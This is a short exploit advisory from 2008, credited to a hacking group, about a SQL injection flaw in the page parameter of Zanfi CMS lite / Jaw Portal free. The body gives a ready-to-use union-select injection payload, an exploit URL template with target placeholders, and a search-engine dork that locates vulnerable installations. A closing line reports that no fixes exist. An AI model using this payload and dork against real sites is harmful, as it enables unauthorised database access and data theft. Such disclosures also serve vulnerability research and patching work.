Zanfi CMS lite - Jaw Portal free (page) SQL Injection Vulnerability

2008-09-10 20:01:03

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Zanfi CMS lite / Jaw Portal free SQL Injection Vulnerability +
+ +
+ Discovered by Cru3l.b0y +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



AUTHOR : Cru3l.b0y
DATE : 10 sep 2008
SITE : WwW.DeltaHacking.Net


#####################################################
APPLICATION : Zanfi CMS lite / Jaw Portal free
DOWNLOAD : http://www.zanfi.nl/down.php?file=ZanfiCmsLite.rar
VENDOR : http://www.zanfi.nl/
Dork : Powered by: Zanfi Solutions
#####################################################


[+] SQL : DBpAGE&pageid=-1'+union+select+version(),user()/*
[+] Exploit : http://[t4rg3t]/[p4th]/index.php?page=[SQL]




################################################################
# Greetings: str0ke, Dr.Trojan, all member in DeltaHacking.Net #
################################################################


WebSite: WwW.DeltaHacking.Net & WwW.w3bsecurity.iR

Contact: Cru3l.b0y[at]gmail.com

#

Fixes

No fixes

In order to submit a new fix you need to be registered.